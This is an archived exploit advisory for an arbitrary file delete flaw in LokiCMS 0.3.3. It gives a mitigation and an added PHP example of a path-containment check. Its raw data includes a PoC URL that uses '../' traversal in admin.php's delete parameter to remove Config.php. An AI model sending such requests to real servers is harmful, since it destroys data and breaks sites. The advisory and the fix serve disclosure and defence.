Vendor: LokiCMS
By: cOndemned
CVSS: 7.5 (HIGH)
Arbitrary File Delete
CWE: 22
Product Name: LokiCMS
Affected Version From: 2000.3.3
Affected Version To: 2000.3.3
Patch Exists: YES
2008

LokiCMS 0.3.3 <= Arbitrary File Delete Vulnerability

LokiCMS 0.3.3 contains an arbitrary file delete vulnerability. An attacker can delete any file on the server by sending a specially crafted HTTP request to admin.php, passing the file's path in the delete parameter. This can be used to delete critical files such as Config.php, after which users can no longer view the index page normally and see only errors.

Mitigation:

Upgrade to the latest version of LokiCMS.
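
This class of bug (CWE-22) is closed by resolving the requested path and confirming it stays inside one allowed directory before deleting. The PHP below is an added example, not LokiCMS code or its actual patch; the function name delete_within, the pages/ directory and the demo files are assumptions made for illustration.

```php
<?php
// Added example: hypothetical helper, not taken from LokiCMS.
// Deletes a file only if it resolves to a regular file inside $baseDir.
function delete_within(string $baseDir, string $requested): bool
{
    // Reject empty input and NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return false;
    }

    // Canonicalise the allowed directory; realpath() returns false if it is missing.
    $base = realpath($baseDir);
    if ($base === false || !is_dir($base)) {
        return false;
    }

    // Resolve "..", "." and symlinks in the requested path, relative to the base.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return false;
    }

    // Containment check: the resolved path must begin with "<base>/".
    // The trailing separator stops "/srv/pages-old" from matching "/srv/pages".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return false;
    }

    return unlink($target);
}

// Constructed demo tree in a temporary directory (assumed layout).
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'delete_demo_' . bin2hex(random_bytes(4));
mkdir($root . '/pages', 0700, true);
mkdir($root . '/includes', 0700, true);
file_put_contents($root . '/pages/old.php', 'page');
file_put_contents($root . '/includes/Config.php', 'config');

// A file inside the allowed directory passes the containment check.
var_dump(delete_within($root . '/pages', 'old.php'));
// A path of the form shown in the PoC resolves outside pages/ and fails the check.
var_dump(delete_within($root . '/pages', '../includes/Config.php'));
// Config.php is still present afterwards.
var_dump(file_exists($root . '/includes/Config.php'));
```

realpath() and unlink() are separate calls, so a directory writable by untrusted users still leaves a race window; keep the allowed directory writable only by the application.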

Exploit-DB raw data:

Name   : LokiCMS 0.3.3 <= Arbitrary File Delete Vulnerability
Author : cOndemned
Greetz : ZaBeaTy, GregStar, irk4z, doctor, Avantura ;*
    
Usage:

    http://[target]/[lokiCMS]/admin.php?delete=[path]/[file]
        
PoC:

    http://[target]/[lokiCMS]/admin.php?delete=../includes/Config.php
       
    Deleting Config.php will cause a situation where users won't be able to view the index page
    normally. Only errors will be visible...

# milw0rm.com [2008-04-29]